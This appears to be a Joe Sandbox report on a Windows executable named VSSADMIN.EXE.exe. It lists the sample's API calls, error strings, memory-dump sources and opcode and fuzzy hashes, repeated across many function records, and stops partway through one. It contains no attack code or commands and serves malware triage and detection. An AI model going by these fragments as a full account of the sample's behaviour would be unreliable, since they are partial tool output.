                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
• String ID: Unhandled exception in script
• API String ID: 3081866767-2699770090
• Opcode ID: 4bccdd4631ef4db3dc50da95ea376d441cf7280d9b9e9edacee6198ae8bfc666
• Instruction ID: 8d5ede278d034fde43ca452e616bc6d53117661fb95187da014c9fb4eb46146e
• Opcode Fuzzy Hash: 4bccdd4631ef4db3dc50da95ea376d441cf7280d9b9e9edacee6198ae8bfc666
• Instruction Fuzzy Hash: F031427260CA8299EB24DF65E8951F96370FF8AB94F400136EA4D8BB56DF3DD145C700
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(00000000,00000000,00000000,00007FF614C77774,?,?,?,?,?,?,?,?,?,?,?,00007FF614C7101D), ref: 00007FF614C72654
  • Part of subcall function 00007FF614C774E0: GetLastError.KERNEL32(00000000,00007FF614C7269E,?,?,?,?,?,?,?,?,?,?,?,00007FF614C7101D), ref: 00007FF614C77507
  • Part of subcall function 00007FF614C774E0: FormatMessageW.KERNEL32 ref: 00007FF614C77536
  • Part of subcall function 00007FF614C77A60: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF614C726FB), ref: 00007FF614C77A9A
• MessageBoxW.USER32 ref: 00007FF614C72730
• MessageBoxA.USER32 ref: 00007FF614C7274C
Strings
Memory Dump Source
• Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: Message$ErrorLast$ByteCharFormatMultiWide
• String ID: %s%s: %s$Fatal error detected
• API String ID: 2806210788-2410924014
• Opcode ID: 7890d9f144e33e33d69a38586b169397518973d2a5b1a440a20cff3164d3e9e8
• Instruction ID: a14333e64394f4d7aec91c6de1b8a0ec33d43a700be5e5ed5aafd33a599e2923
• Opcode Fuzzy Hash: 7890d9f144e33e33d69a38586b169397518973d2a5b1a440a20cff3164d3e9e8
• Instruction Fuzzy Hash: C131647262CEC292EA309B14E4916EA6374FF85B94F405037E68D83A59DF3DD745CB40
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 1edae9836d644cf3f37344bb8067f5d3e72c30a74e7bf89e7e9475504bb25611
• Instruction ID: e52832263dd51c3d50f8a8cb14844fbee443b16ab54c14f4669ffdd6260e5c8f
• Opcode Fuzzy Hash: 1edae9836d644cf3f37344bb8067f5d3e72c30a74e7bf89e7e9475504bb25611
• Instruction Fuzzy Hash: 57F04F65A19E4291EF108B24E48533A5330AF86FB5F540637D56E87AF4DF2ED548C310
Uniqueness

Uniqueness Score: -1.00%

APIs
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
• Opcode ID: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
• Instruction ID: df903f3215afb40246e66390c7a8782672b61de48a1f20f8636c4cf7020c10d8
• Opcode Fuzzy Hash: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
• Instruction Fuzzy Hash: 87119122E38E03E5F6541564D4C237720616F57BFCF140A36EA7E876EACE3EA8418138
Uniqueness

Uniqueness Score: -1.00%

APIs
• FlsGetValue.KERNEL32(?,?,?,00007FF614C89AA3,?,?,00000000,00007FF614C89D3E,?,?,?,?,?,00007FF614C8221C), ref: 00007FF614C8A8AF
• FlsSetValue.KERNEL32(?,?,?,00007FF614C89AA3,?,?,00000000,00007FF614C89D3E,?,?,?,?,?,00007FF614C8221C), ref: 00007FF614C8A8CE
• FlsSetValue.KERNEL32(?,?,?,00007FF614C89AA3,?,?,00000000,00007FF614C89D3E,?,?,?,?,?,00007FF614C8221C), ref: 00007FF614C8A8F6
• FlsSetValue.KERNEL32(?,?,?,00007FF614C89AA3,?,?,00000000,00007FF614C89D3E,?,?,?,?,?,00007FF614C8221C), ref: 00007FF614C8A907
• FlsSetValue.KERNEL32(?,?,?,00007FF614C89AA3,?,?,00000000,00007FF614C89D3E,?,?,?,?,?,00007FF614C8221C), ref: 00007FF614C8A918
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
• Opcode ID: 03277c719d17d560c79db32ac0887211ffe2f08df489d569bf0de2f6ccb26345
• Instruction ID: cb55e11e228a2a7467eeab2d25f24b4dd5abe3b95e3ad79e3ee219c0287d43cd
• Opcode Fuzzy Hash: 03277c719d17d560c79db32ac0887211ffe2f08df489d569bf0de2f6ccb26345
• Instruction Fuzzy Hash: 02113A24F0CE4342FA58936AA5C11BA61725F46FB0F585336E93EC77D6EE2DA442A700
Uniqueness

Uniqueness Score: -1.00%

APIs
• FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F), ref: 00007FF614C8A735
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F), ref: 00007FF614C8A754
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F), ref: 00007FF614C8A77C
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F), ref: 00007FF614C8A78D
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F), ref: 00007FF614C8A79E
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
• Opcode ID: e5b2f5253a305bcc5ca3be95ebd57ba54efab24c1a16ac20d661c62881fac6f9
• Instruction ID: 0194e0d27ffd21c3f8c13ecddd487f401db385377c681af90af8ba56de308296
• Opcode Fuzzy Hash: e5b2f5253a305bcc5ca3be95ebd57ba54efab24c1a16ac20d661c62881fac6f9
• Instruction Fuzzy Hash: 6C11B728A0DE0342F958A63958D55BA21B24F47F74F180736E93ECB2D3ED2DB442B751
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: UTF-16LEUNICODE$UTF-8$ccs
• API String ID: 3215553584-1196891531
• Opcode ID: 04f77fab494744c2c515884d2b3c345e4279dac145e4d051e3529eeeffec7512
• Instruction ID: aa3a720b874d36c084131063d99b8c27c6138291c7ad935d2146308197c8cf15
• Opcode Fuzzy Hash: 04f77fab494744c2c515884d2b3c345e4279dac145e4d051e3529eeeffec7512
• Instruction Fuzzy Hash: 65819C76E0CA5385F7A58E2981F027826B0AB57FA8F558037CB0AD7295DF2DF901A701
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CallEncodePointerTranslator
                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                      • API String ID: 3544855599-2084237596
                                                                                                                                                                      • Opcode ID: 6cf636c1d413b9b1a8fe847baa594964b2e94e970a9ab49fc3c7a486a408bf4b
                                                                                                                                                                      • Instruction ID: 7708ddf7471669cd0a157c1e602e52a9422c251f8d813d077829149fa74f7ee6
                                                                                                                                                                      • Opcode Fuzzy Hash: 6cf636c1d413b9b1a8fe847baa594964b2e94e970a9ab49fc3c7a486a408bf4b
                                                                                                                                                                      • Instruction Fuzzy Hash: CC614937A08A858AEB10CF65D4812AD77B0FB46BA9F044226EF4D57B99CF38E155CB40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                      • String ID: csm$csm
                                                                                                                                                                      • API String ID: 3896166516-3733052814
                                                                                                                                                                      • Opcode ID: 15a90b008ee0b5328ce42465ae6c6f27eb603fbbd906650bc51354757df09ebd
                                                                                                                                                                      • Instruction ID: 016219f5bc2cb5ea05b40b06f03e317a7a95fdaf72173b25056b4d9c293bcfaf
                                                                                                                                                                      • Opcode Fuzzy Hash: 15a90b008ee0b5328ce42465ae6c6f27eb603fbbd906650bc51354757df09ebd
                                                                                                                                                                      • Instruction Fuzzy Hash: 50517A3390CA8687EA648F1595C43697BB0FB56FBAF144136DA9C87A95CF3CE4518B00
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message$ByteCharMultiWide
                                                                                                                                                                      • String ID: %s%s: %s$Fatal error detected
                                                                                                                                                                      • API String ID: 1878133881-2410924014
                                                                                                                                                                      • Opcode ID: 4ccfa1ca3bcae5acffff1ea197f60ccb63abed4ad3799bdff7ceda7eadf1df34
                                                                                                                                                                      • Instruction ID: 0cabe60dd2f0317458d7cc8b18423016e7112c85527d09ac3810cd807fd967c8
                                                                                                                                                                      • Opcode Fuzzy Hash: 4ccfa1ca3bcae5acffff1ea197f60ccb63abed4ad3799bdff7ceda7eadf1df34
                                                                                                                                                                      • Instruction Fuzzy Hash: B831857262CA8292EA30D714E4916EA6374FF85F94F804037E68D87A99DF3DD345CB40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,00007FF614C736B9), ref: 00007FF614C73BF1
                                                                                                                                                                        • Part of subcall function 00007FF614C72620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF614C77774,?,?,?,?,?,?,?,?,?,?,?,00007FF614C7101D), ref: 00007FF614C72654
                                                                                                                                                                        • Part of subcall function 00007FF614C72620: MessageBoxW.USER32 ref: 00007FF614C72730
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFileLastMessageModuleName
                                                                                                                                                                      • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                                                                                                                                      • API String ID: 2581892565-1977442011
                                                                                                                                                                      • Opcode ID: 1e1fb772b1588bb2ef8aa65086850d6655ce62306cfd8bfdc61953077b8dd8c7
                                                                                                                                                                      • Instruction ID: 711d856276ce07ae2e7d2679d58a58d86320b1af73e45da33f543d676ac51ce5
                                                                                                                                                                      • Opcode Fuzzy Hash: 1e1fb772b1588bb2ef8aa65086850d6655ce62306cfd8bfdc61953077b8dd8c7
                                                                                                                                                                      • Instruction Fuzzy Hash: EF017520B1DE8392FE209724D8863B51275AF5AB96F400133D84DC7292EE5DE155C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2718003287-0
                                                                                                                                                                      • Opcode ID: 1e365f9b30df03f18385238fa5722fca72bc799989c9a48dcea0a3fe118199c6
                                                                                                                                                                      • Instruction ID: 2e40456ab58387b5b3d3ced8f526ecf2c6219b08c69dc03f75355d0f082e8f35
                                                                                                                                                                      • Opcode Fuzzy Hash: 1e365f9b30df03f18385238fa5722fca72bc799989c9a48dcea0a3fe118199c6
                                                                                                                                                                      • Instruction Fuzzy Hash: DBD1D572B18E828AE711CF75D4802AC37B1FB56BA8B404136EF5D97B99EE38D416D300
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2780335769-0
                                                                                                                                                                      • Opcode ID: ce0a1e9b89da8c582d0725fbd11fd513ed84fd7ce4f909c8e640cca0bbf582de
                                                                                                                                                                      • Instruction ID: dd55b42f2fde5e925cf492ec1fec847b750e0a2bf12d2e3cab28159a11257e2f
                                                                                                                                                                      • Opcode Fuzzy Hash: ce0a1e9b89da8c582d0725fbd11fd513ed84fd7ce4f909c8e640cca0bbf582de
                                                                                                                                                                      • Instruction Fuzzy Hash: 1B518222E08A528AFB24DFB5D4903BD73B5AF46F68F10453ADE4D87689EF38D4419704
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1956198572-0
                                                                                                                                                                      • Opcode ID: 162ef6909b0da24e61350fefbcaa0130b5f771c4d53ef42d88aea1c24daf7f6c
                                                                                                                                                                      • Instruction ID: 827ab80cacc80360e28ac13ff821de4bd6941a9723479130775979797aff58cb
                                                                                                                                                                      • Opcode Fuzzy Hash: 162ef6909b0da24e61350fefbcaa0130b5f771c4d53ef42d88aea1c24daf7f6c
                                                                                                                                                                      • Instruction Fuzzy Hash: 04118631E1C94243FA549769E5842B952B3FBCAFA1F484132E94987B99CE2DD5858200
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                      • String ID: ?
                                                                                                                                                                      • API String ID: 1286766494-1684325040
                                                                                                                                                                      • Opcode ID: 943dc617f45bed002e629b40e1fde0ce7e8ddbadaf2104e4c3051838adc72d4a
                                                                                                                                                                      • Instruction ID: 6243723ece32913ec4bcdc482baa7c948107280c40b936d205852b500f1de186
                                                                                                                                                                      • Opcode Fuzzy Hash: 943dc617f45bed002e629b40e1fde0ce7e8ddbadaf2104e4c3051838adc72d4a
                                                                                                                                                                      • Instruction Fuzzy Hash: 28410812A0CA8365FB649B25D58137AE6B0EB82FB8F144236EE5C87AD5DF3ED441C704
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF614C87ECE
                                                                                                                                                                        • Part of subcall function 00007FF614C89E48: RtlReleasePrivilege.NTDLL(?,?,?,00007FF614C91E72,?,?,?,00007FF614C91EAF,?,?,00000000,00007FF614C92375,?,?,?,00007FF614C922A7), ref: 00007FF614C89E5E
                                                                                                                                                                        • Part of subcall function 00007FF614C89E48: GetLastError.KERNEL32(?,?,?,00007FF614C91E72,?,?,?,00007FF614C91EAF,?,?,00000000,00007FF614C92375,?,?,?,00007FF614C922A7), ref: 00007FF614C89E68
                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF614C7B135), ref: 00007FF614C87EEC
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFileLastModuleNamePrivilegeRelease_invalid_parameter_noinfo
                                                                                                                                                                      • String ID: C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                      • API String ID: 1752791759-1688815890
                                                                                                                                                                      • Opcode ID: e5e537b1f25b6317a615cc166ba8ab4389d523c8332b43849fdef0541cca01c3
                                                                                                                                                                      • Instruction ID: 0b2ca9aeb5763d4a833c3ab8aaa6e583eb0686974bacee5ada8daabe44179aa5
                                                                                                                                                                      • Opcode Fuzzy Hash: e5e537b1f25b6317a615cc166ba8ab4389d523c8332b43849fdef0541cca01c3
                                                                                                                                                                      • Instruction Fuzzy Hash: 0B414D32A09E5385E7159F26D8C00B967B4EB46FE4B544037EA4E87B85DF3DE8519310
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                                                                                      • String ID: U
                                                                                                                                                                      • API String ID: 442123175-4171548499
                                                                                                                                                                      • Opcode ID: 7853f05ac379f521114fefc1a42187cdb8ba925dbe71da0877b6f38df8d0512d
                                                                                                                                                                      • Instruction ID: 105004092851e96d1fb8d19be8496505c19edd8cfd7d6e0b675a146e1da7a494
                                                                                                                                                                      • Opcode Fuzzy Hash: 7853f05ac379f521114fefc1a42187cdb8ba925dbe71da0877b6f38df8d0512d
                                                                                                                                                                      • Instruction Fuzzy Hash: 7D418232618A4296DB20CF65E4843BA6771FB99BA4F504036EE4DC7798DF3CD441D740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentDirectory
                                                                                                                                                                      • String ID: :
                                                                                                                                                                      • API String ID: 1611563598-336475711
                                                                                                                                                                      • Opcode ID: c79238bf43e0cbae76f50738f5baf0a43c8060c9bac1b93bc5b87429c8295926
                                                                                                                                                                      • Instruction ID: 2dfe0e81140b3302117c91b007f1316cc101a4416b68701f276e916ffa950930
                                                                                                                                                                      • Opcode Fuzzy Hash: c79238bf43e0cbae76f50738f5baf0a43c8060c9bac1b93bc5b87429c8295926
